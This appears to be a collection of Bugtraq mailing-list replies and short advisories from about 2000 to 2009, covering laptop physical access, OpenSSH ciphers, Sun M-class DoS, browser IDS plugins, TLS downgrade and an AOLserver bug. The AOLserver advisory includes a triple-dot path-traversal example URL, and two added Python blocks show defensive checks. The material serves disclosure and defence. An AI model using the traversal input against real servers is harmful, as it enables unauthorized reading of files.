Re: MS09-048 includes fixes for TCP/IP implementation issues reported more than a year ago
Does anyone have a reference pointing to the original announcement on here for these vulnerabilities? I would like to research them regarding the potential continued vulnerability of XP, since MS did not provide a patch for XP products.
Re: Insufficient Authentication vulnerability in Asus notebook
Oh please, I work with corporations large and small. I even work as an adviser to entire countries on how to rebuild after we bomb them to oblivion. Even in the strictest of environments there are always laptops with out-of-the-box configs to be found.

From: Susan Bradley [mailto:sbrad...@pacbell.net]
To: Bob Fiero [mailto:i...@mentalfloss.net]
Cc: bugtraq@securityfocus.com
Sent: Thu, 14 May 2009 15:35:33 -0400
Subject: Re: Insufficient Authentication vulnerability in Asus notebook

Oh please. Corporations build images of machines that don't have this. If you have this issue in your corporation, go talk to your IT guys and tell them to build better deployment images. If you have this problem, your IT guys are not doing their job.

Bob Fiero wrote:
>> You get the idea. This is a non-issue.
>
> I disagree. You are involved in intense business negotiations. During lunch
> you leave your notebook unattended assuming it is safe with a password
> protected userID. Your competitor goes into the conference room and logs in with
> Administrator and installs something like eBlaster to log everything
> you do and email it to him.
>
> Far fetched, but not a non-issue.
>
> From: Mike Vasquez [mailto:mike.vasq...@gmail.com]
> To: Jeremy Brown [mailto:0xjbrow...@gmail.com]
> Cc: MustLive [mailto:mustl...@websecurity.com.ua], bugtraq@securityfocus.com [mailto:bugt...@securityfocus.com]
> Sent: Thu, 14 May 2009 11:02:38 -0400
> Subject: Re: Insufficient Authentication vulnerability in Asus notebook
>
> Once someone has physical access all bets are off, there's a lot they
> can do.
>
> 1) steal it
> 2) boot off cd and reset/enable admin acct
> 3) boot off cd and grab all hashes
> 4) pour a perfectly good frappucino on the keyboard
> 5) cover it with smiley face stickers
>
> You get the idea. This is a non-issue.
Re: Insufficient Authentication vulnerability in Asus notebook
> You get the idea. This is a non-issue.

I disagree. You are involved in intense business negotiations. During lunch you leave your notebook unattended assuming it is safe with a password protected userID. Your competitor goes into the conference room and logs in with Administrator and installs something like eBlaster to log everything you do and email it to him.

Far fetched, but not a non-issue.

From: Mike Vasquez [mailto:mike.vasq...@gmail.com]
To: Jeremy Brown [mailto:0xjbrow...@gmail.com]
Cc: MustLive [mailto:mustl...@websecurity.com.ua], bugtraq@securityfocus.com [mailto:bugt...@securityfocus.com]
Sent: Thu, 14 May 2009 11:02:38 -0400
Subject: Re: Insufficient Authentication vulnerability in Asus notebook

Once someone has physical access all bets are off, there's a lot they can do.

1) steal it
2) boot off cd and reset/enable admin acct
3) boot off cd and grab all hashes
4) pour a perfectly good frappucino on the keyboard
5) cover it with smiley face stickers

You get the idea. This is a non-issue.
Re: OpenSSH security advisory: cbc.adv
> Maybe this was always clear, but along with that reassurance I guess
> you would recommend we all take your stated remedial action:
> [place] the following directive in sshd_config and ssh_config:
> "Ciphers aes128-ctr,aes256-ctr,arcfour256,arcfour,aes128-cbc,aes256-cbc"
> at the very next maintenance opportunity, on the grounds that it can't
> hurt, and can only help?

It can possibly hurt very much - if ctr mode is subject to a different vulnerability. There has been much discussion of ctr mode having *possible* issues, although nothing I know of published directly about ssh.

On the other hand, we have a national security agency who refuses full disclosure, raising a vulnerability and pointing to a switch to counter mode. Perhaps this is to prevent the low-likelihood but possible attack they have found, or perhaps it is to encourage a hasty switch to counter mode which is "more convenient for national security reasons". I don't honestly know - the only REAL info on the subject I've seen has come from djm. You decide who you trust.

Personally, I won't be making that change hastily anywhere - nothing I have is directly threatened by this attack, so I can wait until someone figures out the gist of it and implements an appropriate countermeasure, and I see some legitimate peer review on the topic as opposed to FUD spreading.

I frankly trust the OpenSSH developers a lot more than I trust ssh.com or a puppet state "no such agency" acting as worn-out lapdog for the sorts of people that implement things like the patriot act. People who will not share information with the developers of the software should always be suspect. They have no reason not to without a hidden agenda.

-Bob
Re: Sun M-class hardware denial of service
> Not really - what I am not doing is trying to beat up a firmware
> problem that whilst being quite bad can be mitigated by using native
> features of Solaris. Too bad if OpenBSD cannot do the same - I am not
> really sure about the benefits of OpenBSD on that scale of hardware
> anyway considering the lack of kernel threading and the parlous state
> of userland threading.

I don't think you get it. OpenBSD doesn't care a whit about this. They stumbled upon it as the result of bringing up OpenBSD on such a machine. No - currently I wouldn't run OpenBSD on an M-class box either, other than for development purposes. But that's not really the point, is it. Nobody except you is saying this problem has anything to do with running OpenBSD on a machine.

The point is anyone with a black hat with sufficient clue to ignore this sort of ass-covering nonsense can write a kernel module, go look at what the OpenBSD kernel *does* to wedge the zone, and make a solaris kernel module that does the same. At which point, at a minimum, the same wedging becomes possible from solaris, so yes, this is breaking separation.

You're saying "well golly gee, but it's still separation if you don't let the attacker load kernel modules." Good on you. Have fun with your attacker, may you meet one of competence level greater than a script kiddie someday. I have, they're nice guys. And smart. Smarter than me in a lot of things :)

Personally if I'm buying gear to drink the whole virtualization kool-aid - the kool-aid has to work - meaning stuff done in the guest OS should never be able to do stuff like this.

-Bob
Re: Sun M-class hardware denial of service
> Yet you don't know what it is that causes the issue? What's Sun's
> support arrangement for OpenBSD on SPARC? If it is reproduced in
> Solaris, then I'm sure Sun would address it, but where is the benefit
> for them to do so at present?

It's not about OpenBSD on sparc - the OpenBSD people don't really care - the fact that it's possible at all means anyone with clue and a less than black hat can go take an OpenBSD kernel, figure out what it's doing there, and likely make a solaris kernel module to do the same thing - then they have a nice little tool. This indicates that something is broken, and can likely be taken advantage of.

Frankly, the OpenBSD people aren't going to bother doing it. They're only interested in making OpenBSD go. I can think of several people I've met in bars on the other hand who might be interested in having a domain-instabrick module for solaris.

-Bob
Re: Powerschool 404 Admin Exposure
Exposure of admin interface confirmed still extant in v5.1.2. However, no directories or filenames are shown in v5.1.2, and no administrative links can be navigated to without logging in using administrator credentials.
Re: On-going Internet Emergency and Domain Names
> Are we missing a possible solution? What does the larger
> community suggest?

RBLs such as SpamCop gave me an idea a few years back. We should build a virtual wall around the country. Each and every ISP that has any interconnect with another country would need to be mandated to participate. A cyber-threat type of 24/7 monitoring center with a palatable mix of representatives of each ISP involved, government security, private security entities, etc. would use an established set of protocols to identify external threats. Companies like Symantec already have such centers. Once identified, and that threat is out of US jurisdiction, said IP address(es) are identified and distributed amongst the participating ISP routers and blocked. Shut 'em down, immediately. And just like getting yourself on an RBL, have a set of protocols in place to follow to get off the blocking list.
Re: Re: Bypass phishing protection in Firefox / Opera
Doesn't work with Opera 9.2b. Opera rewrote the URL to: http://www.mozilla.com/firefox/its-a-trap.html
Re: Firekeeper - IDS for Firefox available
> Isn't it the case with every software created to add some protection
> to your computer? Firewalls, antiviruses, IDSes etc. are all adding
> code to your operating system that may, in the future, be found
> vulnerable to some attack. It is just the question whether the protection
> they provide compensates for the additional threat they may introduce.

Yes, protection can mean added code, but consider the kind of code and where it is running. Typically I run an IDS such as snort on a tap interface with no access to send anything out. In particular, it's not looking at endpoint traffic after it's decrypted. Why? IDSes are big complicated things that do lots of string and byte comparisons against data provided by an attacker, the kind of code that is easy for the author to make mistakes in that lead to compromisable situations. So if snort is compromised, all the attacker typically gets without more work is the ability to sniff, not the ability to look at encrypted traffic in the clear, and ideally not the ability to send traffic out.

Other programs (i.e. ssh) deal with complexity like this by attempting to isolate the privileges that the code doing most of the string bashing is running as - i.e. a privsep model, so if you break a piece of it (at least in most of the code) you *don't* see encrypted traffic or passwords.

If this critter is compromised, he likely gets the entire endpoint machine, or if not, he most likely for sure gets the ability to read decrypted https streams.

- Fix the browser bugs rather than having another plugin to look for them.

-Bob
Re: Firekeeper - IDS for Firefox available
* Jex <[EMAIL PROTECTED]> [2007-03-09 13:27]:
...
> > rules similar to Snort ones to describe browser based attack
> > attempts.
> > All incoming HTTP and HTTPS traffic is scanned with these
> > rules. HTTPS and compressed responses are scanned after
> > decryption/decompression.

So the next snort-style overflow/format string/etc bug from all that string bashing code going on in the ids can now let the attacker compromise a process with access to my https stream decrypted - probably on an already conveniently open descriptor.

Yeah. Baby.

"Web Browsers are Bloated Fscking Monsters that are full of bugs"
"Lets add more code to look for people exploiting the bugs - of course this code won't have bugs.."

Now maybe I'm a little bit radical, but something tells me we've learned nothing from the past here kids.

-Bob

Church of the Bloated Spaghetti Monster
    O O
  < B S M >  - ( I'd Fly but I'm Bloated with too much Spaghetti)
 / | | | | | | | \
   | | | | | | | | |

$ sudo ldd firefox-bin
firefox-bin:
Start    End      Type Open Ref GrpRef Name
                  exe  1    0   0      firefox-bin
07cb5000 27cc7000 rlib 0    1   0      /usr/local/mozilla-firefox/libmozjs.so.19.0
0d4fa000 2d4fd000 rlib 0    1   0      /usr/local/mozilla-firefox/libxpcom.so.19.0
063ca000 263df000 rlib 0    2   0      /usr/local/mozilla-firefox/libxpcom_core.so.19.0
0a9ec000 2a9f     rlib 0    4   0      /usr/local/lib/libplds4.so.18.0
09f33000 29f37000 rlib 0    4   0      /usr/local/lib/libplc4.so.18.0
0e7fc000 2e806000 rlib 0    6   0      /usr/local/lib/libnspr4.so.18.0
0a0c2000 2a17a000 rlib 0    1   0      /usr/local/lib/libgtk-x11-2.0.so.802.1
0bc86000 2bcad000 rlib 0    2   0      /usr/local/lib/libgdk-x11-2.0.so.802.1
0dc27000 2dc2e000 rlib 0    3   0      /usr/local/lib/libgdk_pixbuf-2.0.so.802.1
0a0bb000 2a0bf000 rlib 0    3   0      /usr/local/lib/libpangocairo-1.0.so.1200.3
03652000 23657000 rlib 0    4   0      /usr/local/lib/libpangoft2-1.0.so.1200.3
0fbcb000 2fbe2000 rlib 0    5   0      /usr/local/lib/libpango-1.0.so.1200.3
01d67000 21d7     rlib 0    2   0      /usr/local/lib/libatk-1.0.so.1011.3
0b5dd000 2b5ea000 rlib 0    8   0      /usr/local/lib/libgobject-2.0.so.1000.3
0e5a5000 2e5a9000 rlib 0    8   0      /usr/local/lib/libgmodule-2.0.so.1000.3
0278f000 227c9000 rlib 0    10  0      /usr/local/lib/libglib-2.0.so.1000.3
06a54000 26a58000 rlib 0    11  0      /usr/local/lib/libintl.so.3.0
02437000 22513000 rlib 0    11  0      /usr/local/lib/libiconv.so.4.0
0bc14000 2bc2     rlib 0    4   0      /usr/local/lib/libcairo.so.5.0
0ac74000 2ac9     rlib 0    7   0      /usr/X11R6/lib/libfreetype.so.13.1
05fcf000 25fdf000 rlib 0    6   0      /usr/X11R6/lib/libfontconfig.so.3.0
0d0c2000 2d0c7000 rlib 0    5   0      /usr/local/lib/libglitz.so.2.0
0a5d1000 2a5d8000 rlib 0    5   0      /usr/local/lib/libpng.so.5.1
06fe5000 26fed000 rlib 0    5   0      /usr/lib/libz.so.4.1
00035000 20039000 rlib 0    7   0      /usr/X11R6/lib/libXrender.so.4.1
09d92000 29dde000 rlib 0    12  0      /usr/X11R6/lib/libX11.so.9.0
07e6b000 27e6f000 rlib 0    11  0      /usr/X11R6/lib/libXext.so.9.0
03b3e000 23b45000 rlib 0    12  0      /usr/lib/libm.so.2.3
0ecae000 2ecd4000 rlib 0    1   0      /usr/lib/libstdc++.so.42.0
0704c000 2708     rlib 0    5   0      /usr/lib/libc.so.40.3
0e93c000 2e945000 rlib 0    1   0      /usr/lib/libpthread.so.7.0
02384000 22388000 rlib 0    4   0      /usr/X11R6/lib/libSM.so.8.0
0f8dc000 2f8e3000 rlib 0    5   0      /usr/X11R6/lib/libICE.so.8.1
0dd4d000 2dd5     rlib 0    2   0      /usr/X11R6/lib/libXrandr.so.5.0
05396000 2539a000 rlib 0    2   0      /usr/X11R6/lib/libXi.so.9.0
0eb0e000 2eb12000 rlib 0    2   0      /usr/X11R6/lib/libXinerama.so.4.0
0dac4000 2dac8000 rlib 0    2   0      /usr/X11R6/lib/libXcursor.so.3.0
0a9a9000 2a9ac000 rlib 0    3   0      /usr/X11R6/lib/libXfixes.so.4.0
02114000 2211d000 rlib 0    1   0      /usr/X11R6/lib/libexpat.so.5.0
0afd9000 0afd9000 rtld 0    1   0      /usr/libexec/ld.so
Re: *BSD banner INT overflow vulnerability
> that vuln is about as useless as the dhcpd vuln I found. I guess it's good > for practice, but why would you brag about finding that Since it was a vulnerability that bugtraq could post immediately since they didn't have to alert their corporate sugardaddies about it first ;) -Bob
Re: Snitz Forums 2000 v3.4.06
Vendor has supplied a fix: http://forum.snitz.com/forum/topic.asp?TOPIC_ID=62773
Re: LAMP vs Microsoft
> You're confusing what I'm interested in (platform security) with

No, I'm not confusing it at all, I'm saying it's a non-issue. Any Von Neumann type of architecture is "secure" - it does exactly what you tell it to do. If you don't tell it to do insecure things, it does not. If it's not deterministic, then fine, you have an issue.

> the people who use the platform to develop on top of. If the
> foundations of what you're using are insecure, then the web
> developer has a harder task.

I disagree. I think most modern computing platforms start out as "secure" within their limitations if you understand them. It's code written for them that is the problem, plain and simple. The more complexity you add to what you implement on top of a platform, the more bugs you add in the implementation, and the more opportunity for people not to understand the side effects. But I expect to see a great market for people reinventing the wheel for people who don't understand that life is pain, and anyone who says otherwise is selling something.

Oh, and since you mention it, I doubt anyone in the OpenBSD mob would disagree with what I'm saying, or that I would care if they did. Unlike the corporate world there are still some free projects that allow for participants to speak their mind freely and not toe the party line.

Of course, I haven't yet asked what you're selling. Sounds to me like it's another effort to convince the unwitting that life isn't pain and blow SuNshine up their posteriors.

-Bob
Re: LAMP vs Microsoft
> > The simple fact is most of the MS/PHP/JAVA web development will be
> > being done by code monkeys, fresh out of school..
>
> You're confusing what I'm interested in (platform security) with
> the people who use the platform to develop on top of. If the
> foundations of what you're using are insecure, then the web
> developer has a harder task.

I don't think the platform matters all that much if people are writing code and deploying code without security as a goal. While a particular platform may make it more difficult for a certain type of attack to occur (i.e. it's harder to have traditional buffer overflow attacks in something like OpenBSD or Java), the avenue of attacks for web applications is broad enough, particularly when the browser and ease-of-use-assisted social engineering is involved, that the platform is going to be moot compared to basic application design and deployment issues.

Heck, lots of banks do clear text redirects from http://www.bigassedbank.com/ to https://www.bigassedbank.com/, and then have idiots using them from coffee shops. That's much more fundamental than the sorts of things like html goo, sql insertion, browser bugs, etc. etc. etc.

I think the focus on "choice of platform" merely distracts attention from the design of the entire application and what the end to end impacts are. I know I've been given the "It's written in Java, it's secure" line of horse apples from people selling an application that couldn't even do ssl connections to ldap and smtp, and insisted on doing them in the clear. See? The choice of platform in this case is moot - design and implementation without security in mind is the problem.

-Bob
Re: LAMP vs Microsoft
> And I think vulnerabilities disclosed are a much better indicator
> of the changes to QA/development of products than any hyperbole
> from those responsible (be it management or developers.)

No, I think vulnerabilities disclosed is simply a measure of how much development and deployment is happening on the platform. Period.

> I fully expect that both the Microsoft and Linux based platforms to
> continue to be the most popular for web deployments and thus the most
> interesting for hackers to target and vulnerabilities to be found.
>
> What would concern me more here is if one platform was on the up
> whilst the other was on the down.

This will always be the case as one platform changes in popularity for deployments relative to another. The simple fact is most of the MS/PHP/JAVA web development will be being done by code monkeys, fresh out of school.. I'm pretty certain they will "inbug" the same average number of bugs per line of code they write no matter what platform it is. Development is often outsourced to an external coding haus, written to a spec, without complete info about what the whole final application is going to do. Frequently they don't even reuse "mature" code from past releases because you don't want to release it to the external people, or you're too busy chasing platform-du-jour (Want a great example of this? I'm betting Sun One, going from version 5 to version 6 is a good one)

-Bob
Re: LAMP vs Microsoft
> If the number of vulnerabilities is graphed over time, is either
> heading down or both heading up or...?
>
> - I'm not asking for a "who's better", I just want to know if
> anyone has a good set of numbers and if they're graphed for easy
> comparison.
>
> p.s. LAMP = Linux/Apache/MySQL/PHP

Yes, but what are you hoping to prove with those numbers. I think all you're demonstrating is what things get more attention, likely due to their popularity, so they make a more interesting target. I.E. just because you don't find hardly any vulnerabilities for web apps deployed using ANFC (ANFC == AIX, NetCat, Flat Files, and C (please sir can I have another..)[1]) doesn't mean those that are aren't rife with them. It's like all the people running around running OSX thinking how secure it is because there aren't many published vulnerabilities. Don't get me wrong, I actually do believe security through obscurity works (OSX is living proof). But I don't think the numbers you are suggesting will mean much.

Just from what I've "seen" I'd guess they were comparable. What does that mean? Well, pretty much web applications under Windows or LAMP appear to use the same development model for much of their code - first to market with coolest features the fastest. Quality is an afterthought to be dealt with in patches or future releases, which means security is a further afterthought. Do I like running either? No.

The graph numbers end up just being nutritionless fodder for trolls and management.

-Bob

[1] Yes, I have seen an ANFC used for real [2]
[2] Yes, it had a hole.
Re: Strengthen OpenSSH security?
Off topic, but anyway -- you could firewall those smart guys out, since they have to make more connections in less time than any sane legit user would. Something like http://www.bgnett.no/~peter/pf/en/bruteforce.html can be done with almost any firewall I think.
Re: Quarantine your infected users spreading malware
> As many of us know, handling such users on tech support is not very
> cost-effective to ISPs, as if a user makes a call the ISP already
> loses money on that user. Then again, paying abuse desk personnel just
> so that they can disconnect your users is losing money too.
>
> Which one would you prefer?

From home:

# Training wheels for windows boxes. Stomp anything other than
# web ftp and ssh. If they need more they should run something else.
block in log on { $int_if, $wi_if } proto tcp from any os Windows to any
pass in on { $int_if, $wi_if } proto tcp from any os Windows to any port { 80, 443, 22, 21 } keep state

Tricks like max states and an overflow table help too. But worrying about 139 and 445 is just hole du jour. Worrying only about windows is OS du jour. The real problem is not Aunty Jane. It's twofold:

1) Aunty Jane is naive and easily socially engineered
2) Aunty Jane is running crap that can either be directly compromised, or that makes it easier to do 1) above.

Packet filtering customers by default will make no difference as more and more bad software comes out that simply embeds itself in web protocols and the like that you simply can't block arbitrarily and stay in business. Wait for the first good VOIP propagating worm (humming "woo hooo woo hoo hooo")

-Bob
Re: Mozilla Thunderbird SMTP down-negotiation weakness
> The "TLS, if available" option is common to most MUAs and is a serious
> security problem.

As is every other mainstream application of TLS/SSL I've ever seen coded into a mainstream application. Don't just pick on Thunderbird for it - applications using TLS/SSL typically make MITM easy by design, rather than difficult. Sit on your favorite wireless network and MITM your favorite ssl web sites off it. If your user population is very intelligent, maybe only 9 out of 10 will click the "Windows is annoying me with a box and an OK button - I will click OK to keep going" popup and ignore the certificate mismatch utterly. Otherwise the only hard part will be finding a user that doesn't ignore the mismatch - it's so easy to get passwords this way it isn't even sporting. It's like whacking baby seals with a stick.

SSL/TLS applications are just the latest most fertile ground where software designers have put in crutches for lazy stupid people thereby rendering something kinda ok into something mostly useless.

-Bob

--
Bob Beck AICT [EMAIL PROTECTED] University of Alberta
if ((not 0 && not 1)!=(!0 && !1)){print "I want what Larry and Tom smoke!\n";}
Re: ZH2003-3SA (security advisory): Storefront sql injection: users info disclosure
In-Reply-To: <[EMAIL PROTECTED]>

This posting is completely false. Furthermore, the assertion in the report that the vendor was notified is also false. StoreFront 6.0 is a .NET application and contains no file named login.asp. The previous version, StoreFront 5.0, was found to be subject to the SQL Injection vulnerability in October of 2002. A patch was released on October 17th 2002 in build 50.4014.

StoreFront Support

> ZH2003-3SA (security advisory): Storefront sql injection: users info disclosure
> Published: 12/07/2003
> Released: 12/07/2003
> Name: Storefront sql injection: users info disclosure
> Affected Systems: StoreFront 6.0 (and older versions?)
> Issue: Remote attackers can obtain users info
> Author: [EMAIL PROTECTED]
>
> Description
> ***
> Zone-h Security Team has discovered a serious security flaw in StoreFront 6.0
> (and older versions?). "Storefront offers merchants and developers a feature
> rich, fully customizable e-commerce solution at a fraction of the cost to deploy
> and maintain."
>
> Solution:
> *
> The vendor has been contacted and a patch is not yet produced
>
> G00db0y - www.zone-h.org admin
>
> Original advisory here: http://www.zone-h.org/en/advisories/read/id=2684/
Re: ADVISORY SSRT0715 Compaq Management Software Potential SecurityVulnerability (fwd)
I've tested this on various Compaq boxes running Netware 5.0 and 5.1, with and without BorderManager, and found them not to be vulnerable to acting as an anonymous proxy. On each attempt the Compaq web agent abends without affecting other services. I guess if I wanted some excitement I'd have to do something silly, like run an IIS (Insecure Information Server) or Virus Exchange server on the public Internet.
Microsoft Security Bulletin MS01-019
From: Microsoft Product Security <[EMAIL PROTECTED]>
Date: Wed, 28 Mar 2001 07:08:28 -0800

Title: Passwords for Compressed Folders are Recoverable
Date: 28 March 2001
Software: Plus! 98 and Windows Me
Impact: Data compression passwords can be recovered.
Bulletin: MS01-019

Microsoft encourages customers to review the Security Bulletin at: http://www.microsoft.com/technet/security/bulletin/MS01-019.asp.

. . .

Mitigating Factors:
- The password at issue here is not related in any way to the user's network logon password. It is used solely for password-protecting compressed folders.

Considering how frequently most people tend to reuse passwords, this is a pretty strong statement. Since Microsoft states that the folder password is "not related in any way to the user's network logon password" with such confidence, that would seem to imply a mechanism that prohibits password reuse when establishing the folder compression password. Is that the case, or does this statement merely promote a false sense of security?

-- Bob Rogers
Ben Greenbaum: Re: SSHD-1 Logging Vulnerability
>> [users getting out of sync and passwords getting logged]
> Not always. I can think of one Windows SSH client off the top of my head
> that will prompt for the username and password separately - SecureCRT. I'm
> sure there are others as well that I'm just not thinking of right now...

Well, that and it's easy to just brainfart and type a password in when putty or some other silly client asks me who to log in as.

Really all a moot point as long as the daemon logs using authpriv. Your system should be set up to log that stuff to a file only root can read. At that point only root can see when the user gets out of sync, and heck, if they want to they can trojan the daemon to see what they want anyway, assuming passwords are being used. If you arbitrarily syslog stuff like that to world readable files you're running a big risk. The daemon needs to do its part by logging it to the authpriv facility so you can separate it, and after that you need to make sure you set up syslog right.

-Bob
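The control Bob describes above (send authentication messages to the authpriv facility, then make sure the file syslog routes them to is readable by root only) can be audited mechanically. The Python below is an added example for this digest, not code from Bob or from any syslog implementation: it parses a constructed syslog.conf fragment using the classic `facility.priority` selector syntax only (no rsyslog or syslog-ng extensions), lists the targets that receive authpriv messages, and then checks the mode and owner of log files it creates in a temporary directory. The configuration, file names and the sample log line are all constructed.

```python
"""Audit which syslog.conf targets receive authpriv messages and whether
those files are private. Added example, not the post author's code; the
configuration and log line below are constructed."""
import os
import stat
import tempfile
from typing import List, Tuple

# Constructed syslog.conf fragment (classic facility.priority selectors).
SAMPLE_CONF = """
# Everything of level info or higher, except mail, authpriv and cron.
*.info;mail.none;authpriv.none;cron.none    /var/log/messages
# Authentication messages, including sshd's "Invalid user" lines.
authpriv.*                                  /var/log/secure
auth,authpriv.*                             -/var/log/auth.log
*.emerg                                     *
"""

MODE_ISSUE = "mode grants group/other access"
OWNER_ISSUE = "not owned by root"


def selector_parts(selector: str) -> Tuple[set, str]:
    """Split 'fac1,fac2.prio' into ({'fac1', 'fac2'}, 'prio')."""
    facilities, _, priority = selector.partition(".")
    return {f.strip() for f in facilities.split(",")}, priority.strip()


def authpriv_destinations(conf_text: str, facility: str = "authpriv") -> List[str]:
    """Targets of every line that receives messages from `facility`.
    Selectors on one line apply left to right, so a trailing
    'authpriv.none' cancels an earlier '*.info'."""
    targets = []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        selectors, target = fields[0], fields[-1]
        included = False
        for selector in selectors.split(";"):
            names, priority = selector_parts(selector)
            if "*" in names or facility in names:
                included = priority != "none"
        if included:
            targets.append(target.lstrip("-"))  # a leading '-' only disables fsync
    return targets


def private_log_issues(path: str) -> List[str]:
    """Findings for a file that should be readable by root only."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["does not exist"]
    issues = []
    if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        issues.append(MODE_ISSUE)
    if st.st_uid != 0:
        issues.append(OWNER_ISSUE)
    return issues


def demo() -> dict:
    """Write two constructed log files, one 0600 and one 0644, and audit both."""
    workdir = tempfile.mkdtemp()
    private_log = os.path.join(workdir, "secure")
    leaky_log = os.path.join(workdir, "auth.log")
    for path, mode in ((private_log, 0o600), (leaky_log, 0o644)):
        with open(path, "w") as fh:
            # Constructed line: the kind of mistyped-password entry the thread worries about.
            fh.write("sshd[4242]: Invalid user hunter2 from 192.0.2.10\n")
        os.chmod(path, mode)
    return {
        "targets": authpriv_destinations(SAMPLE_CONF),
        "private": private_log_issues(private_log),
        "leaky": private_log_issues(leaky_log),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Note that `*.emerg` with target `*` also receives authpriv messages (written to every logged-in user's terminal), which is why the parser reports non-file targets too rather than silently skipping them.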
Vulnerability in AOLserver
From: [EMAIL PROTECTED]
Date: Tue, 6 Feb 2001 02:31:40 -0800

. . .

AOLserver v3.2 is a web server available from http://www.aolserver.com. A vulnerability exists which allows a remote user to break out of the web root using relative paths (i.e. '...').

Details

AOLServer checks the requested virtual path for any double dots ('..'), and returns a 'Not Found' error page if any are present. However, it does not check for triple dots ('...'). Here is an example URL:

http://localhost:8000/.../[file outside web root]

Note that this vulnerability has only been tested on the latest stable release (v3.2) for the Win32 platform.

. . .

AOLserver v3.2 on Linux (RH 6.0) does not appear to be vulnerable. OS-dependent code?

-- Bob Rogers
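The check the advisory describes (reject '..', accept everything else) fails because it is a denylist of one bad string. The Python below is an added example, not AOLserver code: it models that denylist check (my reading of the advisory is a per-component comparison, since a plain substring test for '..' would also have caught '...') beside a canonicalising check that maps the request onto the resolved web root and refuses anything whose resolved path lands outside it, symlinks included. The web-root tree is constructed in a temporary directory; the function and file names are mine.

```python
"""Web-root containment: the advisory's denylist check beside a
canonicalising check. Added example, not AOLserver code; the directory
tree is constructed in a temporary directory."""
import tempfile
from pathlib import Path
from typing import Optional


def naive_is_safe(virtual_path: str) -> bool:
    """Models the check the advisory describes: reject a '..' component and
    accept everything else. (Assumption: a per-component comparison, the
    only reading under which '...' slips past while '..' is caught.)"""
    return all(part != ".." for part in virtual_path.split("/"))


def resolve_within_root(web_root: str, virtual_path: str) -> Optional[Path]:
    """Map a request path to a file under web_root, or None if it cannot be.
    Only plain name components are accepted, and the fully resolved path
    (symlinks followed) must still lie under the resolved root."""
    root = Path(web_root).resolve()
    # Treat backslashes as separators too: the advisory concerns Win32.
    parts = [p for p in virtual_path.replace("\\", "/").split("/") if p]
    for part in parts:
        # Dot-only components ('.', '..', '...') and NUL are never valid names to serve.
        if not part.strip(".") or "\0" in part:
            return None
    candidate = root.joinpath(*parts).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:  # resolved outside the root, e.g. through a symlink
        return None
    return candidate


def demo() -> dict:
    """Constructed web root with one page and one symlink pointing outside it."""
    base = Path(tempfile.mkdtemp())
    root = base / "www"
    root.mkdir()
    (root / "index.html").write_text("<h1>constructed</h1>")
    try:
        (root / "escape").symlink_to(base)
        symlink_rejected = resolve_within_root(str(root), "/escape/secret.txt") is None
    except OSError:
        symlink_rejected = None  # platform without symlink support
    return {
        "naive_blocks_dotdot": not naive_is_safe("/../secret.txt"),
        "naive_blocks_tripledot": not naive_is_safe("/.../secret.txt"),
        "index_served": resolve_within_root(str(root), "/index.html") == root.resolve() / "index.html",
        "dotdot_rejected": resolve_within_root(str(root), "/../secret.txt") is None,
        "tripledot_rejected": resolve_within_root(str(root), "/.../secret.txt") is None,
        "backslash_rejected": resolve_within_root(str(root), "\\..\\secret.txt") is None,
        "symlink_rejected": symlink_rejected,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The containment check does not need to know which spelling of "parent directory" a given platform honours: whatever the component means locally, the resolved path is compared against the resolved root, and the allow-list of plain names stops dot-only components before they reach the filesystem at all.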
Re: Securax Security Advisory: Windows98 contains a serious buffer overflow with long filename extensions.
I found that 98Lite (*) is not vulnerable to this, but my Eudora app was rendered inaccessible when Zoa_Chien e-mailed me an example. I had to delete his message from my Eudora spool directory before I was able to load Eudora again. (*) 98Lite is a modified Win98. It is a full 98 system without IE, Outlook, and some other MS Internet "features". Contrary to MS lies, this configuration benefits consumers with increased system performance, security and robustness of the OS. More info can be found at http://www.98lite.net Chances are if you install 98 with this configuration, you will never let IE degrade your system again.
Re: MS signed software privileges
At 04:35 PM 2/22/2000 +, you wrote:
> I would like to clarify some aspects from the Elias post
> regarding Microsoft signed software.

With this in mind... I really wish that a favorite Win98 utility of mine, 98Lite, would get some more airtime. (http://www.98lite.net) This latest stab in the back of every Windows user by M$ only further drills home the reasons. I firmly believe that IE on a Windows machine, in itself, is a bug. (And then some) With the use of 98Lite and three files from Win95, I have a full Win98 system without a trace of IE or Outlook. My system runs faster (measurable with WinBench), with a high degree of an increase in stability, and is much much more secure. Despite what Microsoft says, Internet Explorer harms consumers. I really hope for our sake the DOJ gets the job done right this time.
BorderManager csatpxy.nlm fix available.
The file csatpxy1.exe is available for download at http://support.novell.com. This doesn't seem to entirely fix the issue; it only limits memory used by csatpxy.nlm to 100k per session. I haven't tested, but would assume a barrage of telnet connections to port 2000 would eventually eat up the server's memory and bring it grinding to a halt. The only real fix is to block port 2000 on the public interface.

Bob Fiero
Network Specialist
Cummings & Lockwood
NT Service Pack requirements (Bell Atlantic DSL)
I just learned that Bell Atlantic (major ISP on the US East coast) requires its Windows NT DSL customers to remove the latest service packs, rolling back the installed service packs two levels (back to SP4), thus re-installing all of the bugs and security holes corrected by the most recent SPs. Bob Kline mailto:[EMAIL PROTECTED]
Warning: VCasel security hole.
Blue Collar Hackers Union http://bcu.n3.net -Security Bulletin- 1/17/00 From: xDeath To: ALL In Reference to: VCasel 3.0 Platform: Win95
-B A C K G R O U N D I N F O- VCasel (Visual Casel) is a program released by Computer Power Solutions of Illinois which is apparently intended as some sort of add-on to Novell NetWare 3.X and above. What VCasel is supposed to do, or is advertised to do, is provide a nice GUI for network admins to secure and maintain a LAN with ease and provide each user with a customized (unalterable) desktop. The program boasts that with VCasel there is no longer a need for "access control, policy files or profiles." This program also says that it can prevent users from executing files not specified by the Admin. It also does more, but I am entirely too lazy to list the rest of its features.
-P R O B L E M- VCasel fails to successfully limit or prevent the execution of "un-approved files."
